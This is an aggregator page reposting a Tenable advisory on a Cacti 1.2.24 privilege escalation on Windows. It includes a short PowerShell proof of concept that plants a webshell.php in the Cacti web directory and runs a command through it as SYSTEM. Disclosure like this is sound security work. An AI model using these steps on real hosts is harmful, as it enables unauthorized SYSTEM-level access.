all InfoSec news
Cacti Privilege Escalation
Oct. 18, 2023, 3:08 p.m. | Jimi Sebree
Tenable Research Advisories www.tenable.com
Cacti 1.2.24 and prior allows a low-privileged OS user with access to a Windows host where Cacti is installed to create arbitrary PHP files in a web document directory. The user can then execute the PHP files under the security context of SYSTEM.
Proof of Concept
// After login/RDP as user1
PS C:\Users\user1> echo '' | Out-File -Encoding utf8 C:\Apache24\htdocs\cacti\webshell.php
PS C:\Users\user1>
PS C:\Users\user1> Invoke-WebRequest -UseBasicParsing -Headers @{'x-cmd'='whoami'} -Uri http://localhost/cacti/webshell.php | select -ExpandProperty Content
nt authority\system
Jimi …
access cacti concept context directory document echo escalation files host login low php privilege privileged privilege escalation proof rdp security system under web windows
More from www.tenable.com / Tenable Research Advisories
Approach.App Multiple Vulnerabilities
1 week, 6 days ago |
www.tenable.com
Path Traversal Affecting Multiple CData Products
3 weeks, 6 days ago |
www.tenable.com
Arcserve Unified Data Protection 9.2 Multiple Vulnerabilities
1 month, 2 weeks ago |
www.tenable.com
Jobs in InfoSec / Cybersecurity
Social Engineer For Reverse Engineering Exploit Study
@ Independent study | Remote
Principal Business Value Consultant
@ Palo Alto Networks | Chicago, IL, United States
Cybersecurity Specialist, Sr. (Container Hardening)
@ Rackner | San Antonio, TX
Penetration Testing Engineer- Remote United States
@ Stanley Black & Decker | Towson MD USA - 701 E Joppa Rd Bg 700
Internal Audit- Compliance & Legal Audit-Dallas-Associate
@ Goldman Sachs | Dallas, Texas, United States
Threat Responder
@ Deepwatch | Remote